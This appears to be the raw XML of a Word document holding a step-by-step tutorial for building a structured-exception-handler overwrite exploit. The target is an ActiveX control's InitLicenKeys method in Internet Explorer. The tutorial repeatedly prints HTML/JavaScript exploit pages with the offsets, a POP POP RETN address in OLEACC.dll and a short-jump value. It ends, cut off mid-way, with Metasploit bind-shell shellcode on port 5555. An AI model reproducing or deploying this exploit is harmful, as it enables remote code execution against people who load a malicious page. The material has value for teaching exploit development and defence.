    <w:p w:rsidR="00D962FF" w:rsidRDefault="00D962FF"/>
    <w:p w:rsidR="00D962FF" w:rsidRDefault="00D962FF"/>
    <w:p w:rsidR="00D962FF" w:rsidRDefault="00D962FF"/>
    <w:p w:rsidR="00D962FF" w:rsidRDefault="00D962FF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>From pattern_offset we can see that SEH was overwritten after 2048 bytes and NSEH was overwritten after 2052 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098240F" w:rsidRDefault="0011786B" w:rsidP="00102851">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="10858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943600" cy="1085850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00102851" w:rsidRDefault="00102851" w:rsidP="00102851">
      <w:r>
        <w:t>So we will alter poc code as follows</w:t>
      </w:r>
      <w:r w:rsidR="008F61CE">
        <w:t>:-</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9576"/>
      </w:tblGrid>
      <w:tr w:rsidR="0011786B" w:rsidTr="00936856">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9576" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0011786B" w:rsidRDefault="0011786B" w:rsidP="0011786B">
            <w:r>
              <w:t>&lt;html&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0011786B" w:rsidRDefault="0011786B" w:rsidP="0011786B">
            <w:r>
              <w:t>&lt;object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target' /&gt;&lt;/object&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0011786B" w:rsidRDefault="0011786B" w:rsidP="0011786B">
            <w:r>
              <w:t>&lt;script language='javascript'&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0011786B" w:rsidRDefault="0011786B" w:rsidP="0011786B"/>
          <w:p w:rsidR="0011786B" w:rsidRDefault="0011786B" w:rsidP="0011786B">
            <w:r>
              <w:t>junk="\x41";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0011786B" w:rsidRDefault="0011786B" w:rsidP="0011786B">
            <w:r>
              <w:t>while (junk.length&lt;2048){ junk+=junk;}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0011786B" w:rsidRDefault="0011786B" w:rsidP="0011786B">
            <w:r>
              <w:t>seh="\x42\x42\x42\x42";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0011786B" w:rsidRDefault="0011786B" w:rsidP="0011786B">
            <w:r>
              <w:t>nseh="\x43\x43\x43\x43";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0011786B" w:rsidRDefault="0011786B" w:rsidP="0011786B">
            <w:r>
              <w:t>shell="\x44"</w:t>
            </w:r>
            <w:r w:rsidR="006C61C8">
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0011786B" w:rsidRDefault="0011786B" w:rsidP="0011786B">
            <w:r>
              <w:t>while (shell.length&lt;2048){ shell+=shell;}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0011786B" w:rsidRDefault="0011786B" w:rsidP="0011786B">
            <w:r>
              <w:t>//        [JUNK]         +    [ NSEH Pointer ]     +                [SEH Value]                       +   [SHELL]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0011786B" w:rsidRDefault="0011786B" w:rsidP="0011786B">
            <w:r>
              <w:t>//  [  2048 Bytes]    +    [SHORT JUMP ]     +   [POINTER TO POP POP RETN ]   +   [ SHELL]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00102851" w:rsidRDefault="00102851" w:rsidP="0011786B"/>
          <w:p w:rsidR="0011786B" w:rsidRDefault="0011786B" w:rsidP="0011786B">
            <w:r>
              <w:t>arg1=junk+nseh+seh+shell;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0011786B" w:rsidRDefault="0011786B" w:rsidP="0011786B">
            <w:r>
              <w:t>arg2="TEST";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0011786B" w:rsidRDefault="0011786B" w:rsidP="0011786B">
            <w:r>
              <w:t>arg3="TEST";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0011786B" w:rsidRDefault="0011786B" w:rsidP="0011786B">
            <w:r>
              <w:t>arg4="TEST";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0011786B" w:rsidRDefault="0011786B" w:rsidP="0011786B">
            <w:r>
              <w:t>arg5="TEST";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0011786B" w:rsidRDefault="0011786B" w:rsidP="0011786B">
            <w:r>
              <w:t>target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 );</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0011786B" w:rsidRDefault="0011786B" w:rsidP="0011786B">
            <w:r>
              <w:t>&lt;/SCRIPT&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0011786B" w:rsidRDefault="0011786B" w:rsidP="0011786B">
            <w:r>
              <w:t>&lt;/BODY&gt;&lt;/HTML&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0011786B" w:rsidRDefault="0011786B"/>
    <w:p w:rsidR="00342FAB" w:rsidRDefault="008F61CE">
      <w:r>
        <w:t>Restart inter</w:t>
      </w:r>
      <w:r w:rsidR="00D84F75">
        <w:t>net explorer and crash it again. As we can see in screenshot SEH chain was overwritten by our 4 C’s</w:t>
      </w:r>
      <w:r w:rsidR="00F53FE7">
        <w:t xml:space="preserve"> and NSEH contains our B’s</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84F75" w:rsidRDefault="00D84F75">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2324100" cy="120967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324100" cy="1209675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098240F" w:rsidRDefault="0098240F"/>
    <w:p w:rsidR="006B01FB" w:rsidRDefault="006B01FB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The next step is to find some good pointer that points to POP POP RETN instruction,  mona does the trick for us, finding all possible po</w:t>
      </w:r>
      <w:r w:rsidR="00ED1E73">
        <w:t xml:space="preserve">inters. Mona saves all </w:t>
      </w:r>
      <w:r>
        <w:t>the pointer in a file seh.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F53FE7" w:rsidRDefault="006B01FB">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5934075" cy="46672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34075" cy="4667250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="006B01FB" w:rsidRDefault="006B01FB"/>
    <w:p w:rsidR="006B01FB" w:rsidRDefault="006B01FB" w:rsidP="006B01FB">
      <w:r>
        <w:t>So our net poc code is as follows:-</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9576"/>
      </w:tblGrid>
      <w:tr w:rsidR="006B01FB" w:rsidTr="00936856">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9576" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="006B01FB" w:rsidRDefault="006B01FB" w:rsidP="00936856">
            <w:r>
              <w:t>&lt;html&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B01FB" w:rsidRDefault="006B01FB" w:rsidP="00936856">
            <w:r>
              <w:t>&lt;object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target' /&gt;&lt;/object&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B01FB" w:rsidRDefault="006B01FB" w:rsidP="00936856">
            <w:r>
              <w:t>&lt;script language='javascript'&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B01FB" w:rsidRDefault="006B01FB" w:rsidP="00936856"/>
          <w:p w:rsidR="006B01FB" w:rsidRDefault="006B01FB" w:rsidP="00936856">
            <w:r>
              <w:t>junk="\x41";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B01FB" w:rsidRDefault="006B01FB" w:rsidP="00936856">
            <w:r>
              <w:t>while (junk.length&lt;2048){ junk+=junk;}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B01FB" w:rsidRDefault="006B01FB" w:rsidP="006B01FB">
            <w:r>
              <w:t>// pointer to pop pop retn  74c8b90c</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B01FB" w:rsidRDefault="006B01FB" w:rsidP="006B01FB">
            <w:r>
              <w:t>seh="\x0C\xB9\xC8\x74";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00EC7806" w:rsidRDefault="006B01FB" w:rsidP="00936856">
            <w:r>
              <w:t>nseh="\x</w:t>
            </w:r>
            <w:r w:rsidR="00FF442A">
              <w:t>43</w:t>
            </w:r>
            <w:r>
              <w:t>\x</w:t>
            </w:r>
            <w:r w:rsidR="00FF442A">
              <w:t>43</w:t>
            </w:r>
            <w:r>
              <w:t>\x</w:t>
            </w:r>
            <w:r w:rsidR="00FF442A">
              <w:t>43</w:t>
            </w:r>
            <w:r>
              <w:t>\x</w:t>
            </w:r>
            <w:r w:rsidR="00FF442A">
              <w:t>43</w:t>
            </w:r>
            <w:r>
              <w:t>";</w:t>
            </w:r>
            <w:r w:rsidR="00D26CCE">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B01FB" w:rsidRDefault="006B01FB" w:rsidP="00936856">
            <w:r>
              <w:t>shell="\x44"</w:t>
            </w:r>
            <w:r w:rsidR="009B6D5A">
              <w:t>;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B01FB" w:rsidRDefault="006B01FB" w:rsidP="00936856">
            <w:r>
              <w:t>while (shell.length&lt;2048){ shell+=shell;}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B01FB" w:rsidRDefault="006B01FB" w:rsidP="00936856">
            <w:r>
              <w:t>//        [JUNK]         +    [ NSEH Pointer ]     +                [SEH Value]                       +   [SHELL]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B01FB" w:rsidRDefault="006B01FB" w:rsidP="00936856">
            <w:r>
              <w:t>//  [  2048 Bytes]    +    [SHORT JUMP ]     +   [POINTER TO POP POP RETN ]   +   [ SHELL]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B01FB" w:rsidRDefault="006B01FB" w:rsidP="00936856"/>
          <w:p w:rsidR="006B01FB" w:rsidRDefault="006B01FB" w:rsidP="00936856">
            <w:r>
              <w:t>arg1=junk+nseh+seh+shell;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B01FB" w:rsidRDefault="006B01FB" w:rsidP="00936856">
            <w:r>
              <w:t>arg2="TEST";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B01FB" w:rsidRDefault="006B01FB" w:rsidP="00936856">
            <w:r>
              <w:t>arg3="TEST";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B01FB" w:rsidRDefault="006B01FB" w:rsidP="00936856">
            <w:r>
              <w:t>arg4="TEST";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B01FB" w:rsidRDefault="006B01FB" w:rsidP="00936856">
            <w:r>
              <w:t>arg5="TEST";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B01FB" w:rsidRDefault="006B01FB" w:rsidP="00936856">
            <w:r>
              <w:t>target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 );</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B01FB" w:rsidRDefault="006B01FB" w:rsidP="00936856">
            <w:r>
              <w:t>&lt;/SCRIPT&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="006B01FB" w:rsidRDefault="006B01FB" w:rsidP="00936856">
            <w:r>
              <w:t>&lt;/BODY&gt;&lt;/HTML&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="006B01FB" w:rsidRDefault="006B01FB" w:rsidP="006B01FB"/>
    <w:p w:rsidR="006B01FB" w:rsidRDefault="003319C6" w:rsidP="00414911">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2040"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>As soon as the page is loaded and internet explorer prompts for activeX control execution jump to debugger and find the address 74c8000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD6BF2" w:rsidRDefault="008B773E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5667375" cy="2381250"/>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667375" cy="2381250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B773E" w:rsidRDefault="001F1448">
      <w:r>
        <w:t>Double click on the address as our POP POP RETN instruction resides in that ranges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B773E" w:rsidRDefault="008B773E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="284797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FF442A" w:rsidRDefault="00FF442A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Find the address </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF442A">
        <w:t>74c8b90c</w:t>
      </w:r>
      <w:r>
        <w:t>, click on it and press F2 to set break point so that debugger stops execution when it reaches that address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF442A" w:rsidRDefault="00FF442A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="266700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943600" cy="2667000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B773E" w:rsidRDefault="008B773E"/>
    <w:p w:rsidR="00CD6BF2" w:rsidRDefault="007D5C9F">
      <w:r>
        <w:t>Now click on yes to continue execution of activeX component.</w:t>
      </w:r>
      <w:r w:rsidR="00C13680">
        <w:t xml:space="preserve"> And then press Shift+F9 to pass the exception.</w:t>
      </w:r>
      <w:r w:rsidR="004F3041">
        <w:t xml:space="preserve"> Notice we have landed at the address 74C8B90C.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C13680" w:rsidRDefault="00C13680">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="37147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C13680" w:rsidRDefault="004F3041">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Now slowly step by pressing F7 three times and we will land at the instruction address where our NSEH and SHELL code resides.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0084384A" w:rsidRDefault="0084384A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="44672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84384A" w:rsidRDefault="0084384A">
      <w:r>
        <w:t>Notice that we have two instructions  after our 4 C’s (i.e 43), we have to find some way to jump 3-4 bytes so that we can safely hop to our shell code, the assembly command to jump 3 address is EB 03 and to jump 4 address is EB 04 and so on… in our case I will jump around ten bytes so our instruction will be EB 04 90 90 (these two nops are just for padding as )</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9576"/>
      </w:tblGrid>
      <w:tr w:rsidR="0084384A" w:rsidTr="0084384A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9576" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0084384A" w:rsidRDefault="0084384A" w:rsidP="0084384A">
            <w:r>
              <w:t>&lt;html&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0084384A" w:rsidRDefault="0084384A" w:rsidP="0084384A">
            <w:r>
              <w:t>&lt;object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target' /&gt;&lt;/object&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0084384A" w:rsidRDefault="0084384A" w:rsidP="0084384A">
            <w:r>
              <w:t>&lt;script language='javascript'&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0084384A" w:rsidRDefault="0084384A" w:rsidP="0084384A"/>
          <w:p w:rsidR="0084384A" w:rsidRDefault="0084384A" w:rsidP="0084384A">
            <w:r>
              <w:t>junk="\x41";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0084384A" w:rsidRDefault="0084384A" w:rsidP="0084384A">
            <w:r>
              <w:t>while (junk.length&lt;2048){ junk+=junk;}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0084384A" w:rsidRDefault="0084384A" w:rsidP="0084384A"/>
          <w:p w:rsidR="0084384A" w:rsidRDefault="0084384A" w:rsidP="0084384A">
            <w:r>
              <w:t>// pointer to pop pop retn  74c8b90c OLEACC.dll</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0084384A" w:rsidRDefault="0084384A" w:rsidP="0084384A">
            <w:r>
              <w:t>seh="\x0C\xB9\xC8\x74";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0084384A" w:rsidRDefault="0084384A" w:rsidP="0084384A">
            <w:r>
              <w:t>nseh="\xEB\x0A\x90\x90"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0084384A" w:rsidRDefault="0084384A" w:rsidP="0084384A">
            <w:r>
              <w:t>nop="\x90";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0084384A" w:rsidRDefault="0084384A" w:rsidP="0084384A">
            <w:r>
              <w:t>shell="\x44"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0084384A" w:rsidRDefault="0084384A" w:rsidP="0084384A">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>while (nop.length&lt;16){ nop+=nop;}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0084384A" w:rsidRDefault="0084384A" w:rsidP="0084384A">
            <w:r>
              <w:t>while (shell.length&lt;2048){ shell+=shell;}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0084384A" w:rsidRDefault="0084384A" w:rsidP="0084384A">
            <w:r>
              <w:t>//        [JUNK]         +    [ NSEH Pointer ]     +                [SEH Value]                       +   [SHELL]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0084384A" w:rsidRDefault="0084384A" w:rsidP="0084384A">
            <w:r>
              <w:t>//  [  2048 Bytes]    +    [SHORT JUMP ]     +   [POINTER TO POP POP RETN ]   +   [ SHELL]</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0084384A" w:rsidRDefault="0084384A" w:rsidP="0084384A">
            <w:r>
              <w:t>arg1=junk+nseh+seh+shell;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0084384A" w:rsidRDefault="0084384A" w:rsidP="0084384A">
            <w:r>
              <w:t>arg2="TEST";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0084384A" w:rsidRDefault="0084384A" w:rsidP="0084384A">
            <w:r>
              <w:t>arg3="TEST";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0084384A" w:rsidRDefault="0084384A" w:rsidP="0084384A">
            <w:r>
              <w:t>arg4="TEST";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0084384A" w:rsidRDefault="0084384A" w:rsidP="0084384A">
            <w:r>
              <w:t>arg5="TEST";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0084384A" w:rsidRDefault="0084384A" w:rsidP="0084384A">
            <w:r>
              <w:t>target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 );</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0084384A" w:rsidRDefault="0084384A" w:rsidP="0084384A">
            <w:r>
              <w:t>&lt;/SCRIPT&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0084384A" w:rsidRDefault="0084384A" w:rsidP="0084384A">
            <w:r>
              <w:t>&lt;/BODY&gt;&lt;/HTML&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C13680" w:rsidRDefault="00C13680"/>
    <w:p w:rsidR="00792A94" w:rsidRDefault="00792A94">
      <w:r>
        <w:t>Again repeat the same process i.e restart internet explorer, load exploit page and set break point at address 74c8b90c and click on Yes to continue execution of activeX control. Then step into 3 times by pressing F7 and we will land at address where out new NSEH value is written.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00792A94" w:rsidRDefault="00792A94">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="444817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E22470" w:rsidRDefault="00E22470"/>
    <w:p w:rsidR="00E22470" w:rsidRDefault="00E22470"/>
    <w:p w:rsidR="00E22470" w:rsidRDefault="00693EB6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>we can see</w:t>
      </w:r>
      <w:r w:rsidR="00402179">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we have jumped a few address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E22470" w:rsidRDefault="00E22470">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="444817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B03F86" w:rsidRDefault="00B03F86"/>
    <w:p w:rsidR="00B03F86" w:rsidRDefault="00CF769A">
      <w:r>
        <w:t>Game+</w:t>
      </w:r>
      <w:r w:rsidR="00B03F86">
        <w:t>Over ShellCode</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9576"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C53E1A" w:rsidTr="00C53E1A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9576" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>&lt;html&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>&lt;object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target' /&gt;&lt;/object&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>&lt;script language='javascript'&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A"/>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>junk="\x41";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>while (junk.length&lt;2048){ junk+=junk;}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A"/>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>// pointer to pop pop retn  74c8b90c OLEACC.dll</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>seh="\x0C\xB9\xC8\x74";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>nseh="\xEB\x0A\x90\x90"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>nop="\x90";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>//win32_bind -  EXITFUNC=seh LPORT=5555 Size=709 Encoder=PexAlphaNum http://metasploit.com</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>shell=""+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
              <w:t>"\x4e\x46\x46\x42\x46\x32\x4b\x48\x45\x54\x4e\x53\x4b\x58\x4e\x47"+</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C53E1A" w:rsidRDefault="00C53E1A" w:rsidP="00C53E1A">
            <w:r>
